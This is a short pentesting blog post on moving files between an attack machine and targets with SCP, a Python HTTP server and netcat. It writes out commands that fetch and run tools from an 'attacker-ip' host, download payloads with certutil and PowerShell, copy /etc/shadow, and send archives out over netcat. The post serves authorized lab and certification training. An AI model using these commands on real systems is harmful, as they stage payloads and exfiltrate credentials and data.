Stop Using Shared Folders in Your Pentest Lab. Use These Instead

The file transfer habits you build in your lab will follow you into real engagements. Make sure they are the right ones.

Mbcyberworks

~3 min read · April 27, 2026 (Updated: April 27, 2026) · Free: Yes

When I set up my homelab for PNPT prep, I did what most beginners do: shared folders between my attack machine and target VMs. Drag, drop, done. It felt efficient.

Then they broke mid-lab. Permission errors. VirtioFS conflicts. Mounts that simply disappeared. And it hit me: this convenience does not exist in real engagements. I was training myself for a scenario that would never happen.

In a real penetration test, you have network access and a command line. That is it. If your file transfer method requires guest tools, it will not survive contact with a real target.

These are the three methods that actually matter.

1. SCP: Reliable When You Have SSH

SSH is not just for remote access. It is your most reliable file transfer option, and it works wherever SSH is available.

# Set up key-based authentication once
ssh-keygen -t ed25519 -f ~/.ssh/lab_key
ssh-copy-id -i ~/.ssh/lab_key user@target

After that, transfers work without passwords:

# Upload a tool to the target
scp linpeas.sh user@10.10.10.50:~/
# Download evidence
scp user@10.10.10.50:/etc/shadow ./evidence/
# Transfer multiple files at once
scp *.py user@internal-server:/tmp/

If SCP is not an option because you do not have direct SSH access to the target, the next method covers you.

2. Python HTTP Server: Instant File Staging

One command, no installation, works on any OS with wget or curl.

# On your attack machine
cd ~/pentest-tools
python3 -m http.server 8080

Pulling files from a Linux target:

wget http://attacker-ip:8080/linpeas.sh
curl -O http://attacker-ip:8080/exploit.py

From a Windows target with PowerShell:

powershell
Invoke-WebRequest -Uri "http://attacker-ip:8080/nc.exe" -OutFile "nc.exe"

Or via certutil when PowerShell is restricted:

cmd
certutil -urlcache -split -f "http://attacker-ip:8080/payload.exe" payload.exe

If port 8080 is filtered, try 9000 or 4444. The server logs all requests automatically, which is useful for keeping track of what was transferred during an engagement.

3. Netcat: When Everything Else Is Blocked

Netcat handles raw data transfer with minimal setup, when it is available on the target. It works in restricted shells where wget and curl are not available.

# Send a file (from the target)
nc attacker-ip 9999 < sample-data.sql
# Receive a file (on your attack machine)
nc -l -p 9999 > evidence.sql

Reversed, when pushing a tool to the target:

# Attack machine sends
nc -l -p 9999 < tool.sh
# Target receives
nc attacker-ip 9999 > tool.sh

For large files, combine the transfer with compression:

tar czf - /opt/backup/ | nc attacker-ip 9999

What This Looks Like in Practice

These examples are intended for authorized labs, certification environments, and approved penetration tests only.

Initial foothold: you have a shell but need enumeration tools.

wget http://attack-box:8080/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh | tee linpeas-output.txt

Privilege escalation: a specific tool is needed.

curl http://attack-box:8080/pspy64 -o pspy64
chmod +x pspy64
./pspy64 -pf -i 1000

Retrieving evidence: collecting proof for your report.

tar czf evidence.tar.gz /opt/backup/sample-data/
nc attack-box 9999 < evidence.tar.gz

Lateral movement: pushing a tool to an internal host.

scp exploit.py user@10.10.1.50:~/
ssh user@10.10.1.50 'python3 exploit.py'

Common Problems

SSH connection refused:

sudo systemctl enable ssh - now
sudo ufw allow ssh

HTTP server not reachable:

ss -tlnp | grep :8080 # Check whether it is listening
ping target-ip # Test connectivity

Permission issues:

chmod +x script.sh
ls -la /path/to/directory/

Most file transfer problems are actually network or permission problems. Always check the connection before adjusting the transfer method.

Quick Reference

Save this for your next engagement:

# SCP
scp file.txt user@target:~/
scp user@target:/path/to/file.txt ./
# HTTP server
python3 -m http.server 8080
wget http://attacker-ip:8080/file.txt
# Netcat
nc -l -p 9999 < file.txt # send
nc target-ip 9999 > file.txt # receive

The habits you build in your lab follow you into real engagements. Practicing with methods that work in the real world makes your preparation for PNPT, CPTS, and actual penetration tests considerably stronger.

I cover practical pentesting techniques and certification prep in Dutch at MB Cyberworks, including the full Dutch version of this article.

#pentesting #file-transfer #scp #cpt #pnpt

< Go to the original